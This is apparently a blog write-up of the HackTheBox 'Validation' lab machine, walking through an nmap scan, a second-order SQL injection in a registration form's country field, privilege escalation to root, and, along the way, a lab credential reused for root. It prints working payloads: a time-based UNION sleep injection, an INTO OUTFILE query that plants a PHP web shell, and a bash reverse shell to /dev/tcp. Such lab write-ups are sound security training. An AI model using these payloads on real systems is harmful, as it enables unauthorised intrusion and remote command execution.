HackTheBox — Validation

0xEmbo
3 min readSep 23, 2021

--

As always, we start with nmap to discover open ports/services.

Nmap scan

namp -sC -sV -oA validation 10.10.11.116

Nmap scan report for 10.10.11.116
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519) 80/tcp open http Apache httpd 2.4.48
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8). 5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have 3 ports open:

22 => SSH

80 => HTTP

8080 => HTTP

HTTP Enumeration

Port 8080 gives 502 Bad Gateway so lets enumerate port 80

Going to http://10.10.11.116 we have a registration form.

Putting some data and click submit.

It seems like it’s saving our inputs into the database and then fetching them and displaying them on the page. OR it is just displaying them without using a database.

I tried injecting a single quote in the username field but nothing happened, then i intercepted the request and injected a single quote in the country parameter and i got this error.

Making the connection sleep for 10 seconds Andorra' UNION SELECT sleep(10); -- -

And follow redirection, it worked successfully.

I guess we have a second order SQL injection vulnerability, because the sleep occurs when fetching (displaying) the data on the page, and doesn’t occur when submitting the data at first.

That means that the user input is sanitized correctly, but the problem is when the web application fetches the data from the database it doesn’t validate it.

Initial Foothold

Now that we have a SQLi, lets try to drop a shell on the box. Andorra' UNION SELECT '<?php SYSTEM($_GET["c"]) ?>' INTO OUTFILE '/var/www/html/shell.php' -- -

We get an error but when we try to visit shell.php it’s created successfully.

Now lets specify the c parameter to execute id command.

You can use any reverse shell you want, i like using this one bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'

Getting root

There is config file that contains mysql credentials.

uhc:uhc-9qual-global-pw

Tried this password with root and we are now root!

If you find it useful, kindly give me a respect

Linkedin | Github

--

--

0xEmbo

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.